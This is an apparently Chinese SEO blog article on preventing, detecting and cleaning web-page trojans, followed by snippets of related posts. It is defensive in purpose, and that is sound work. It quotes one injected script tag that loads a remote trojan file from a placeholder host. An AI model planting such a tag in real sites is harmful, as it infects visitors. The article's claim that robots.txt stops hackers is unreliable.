Categories


Tags


如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

1:网页挂马的种类.

目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。

卢松松以前做过的‘极品源码下载站’就遇到过JS挂马

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

&lsquo;校园闹翻天论坛&rsquo;就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID

2:如何检测网页是否被挂马。

(1):专业检测工具,六款免费网页安全检测工具横向测评(华军软件园)点此进入

(2):Google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测卢松松博客是否安全可点此查看。

如何预防和检测网页挂马? 网站安全 SEO推广 第1张

3:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。

如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)

4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。 点此查看robots.txt使用方法。

来源:卢松松博客


Public @ 2014-10-23 15:37:43

医疗权威资源产品合作指南- 为什么要甄选医疗权威资源

为什么要甄选医疗权威资源● 提高医疗搜索用户体验数据价值:真实性、质量度、权威性医疗作为关系用户生命健康的领域,用户在获取信息时对“信息真实性”、“信息质量”、“信息提供者的权威度” 极为敏感。数据的真实性、质量度、权威性是影响医疗搜索用户满意度极为关键的因素。为了提高医疗搜索用户数据体验,为用户提供真正有价值可参考的数据,需要对医疗数据进行甄选。落地页体验医疗搜索落地页长期以来缺乏监管,广告和下

Public @ 2015-09-05 15:38:30

搜索公开课复盘之《搜索算法全解析》

上周的百度搜索线上直播课《开发者避雷指南》之搜索算法全解析,你看了吗?直播中,百度搜索产品经理结合理论与案例详细解读了百度搜索网站质量规范和搜索算法中的常见违规行为,供广大开发者参考。如果你错过了直播课,也没关系,我们为你准备了这篇复盘文章,共同学习百度搜索算法规则,巧妙避开那些伤害用户体验的雷点。一、如何让百度搜索选择我?1、网站的基本素质(1)新站建立时适当交换外链,利于Spider爬取发现;

Public @ 2020-04-08 15:22:10

关于网站被挂马\黑客入侵的只读\误杀相关问题

网站安全现状:据360公司发布的统计显示:国内超过60%的网站存在漏洞、超过40%的网站存在后门,互联网上每天都在爆发"拖库"事件。一直以来,企业非常痛恨由漏洞导致的黑客攻击行为,但同时也没有更好的方式加以解决。黑客的攻击行为不仅对企业造成了直接经济损失,而且处理不当会形成公关危机,导致客户丧失对企业的信任。黑客入侵对客户网站带来的影响:网站被黑客挂马、黑链、影响百度排名,被传

Public @ 2016-02-08 15:37:41

[分享]云服务器挂马清理实例

网站通过百度搜索访问,会跳转到异常网站。经过仔细分析、核实,确定是被挂马造成,但网页源文件中、使用安全工具扫描都没有发现异常代码。新建空文件1.html,使用工具测试也显示挂马,说明是系统层面问题。1.png经查看站点设置等信息,发现iis站点》模块被加入了异常dll,如图2.png3.png根据经验,%windir%开头的路径是系统自动加的,理论上没有问题;如果是c:\windows要重点核实。

Public @ 2013-05-10 15:37:40

更多您感兴趣的搜索

0.441190s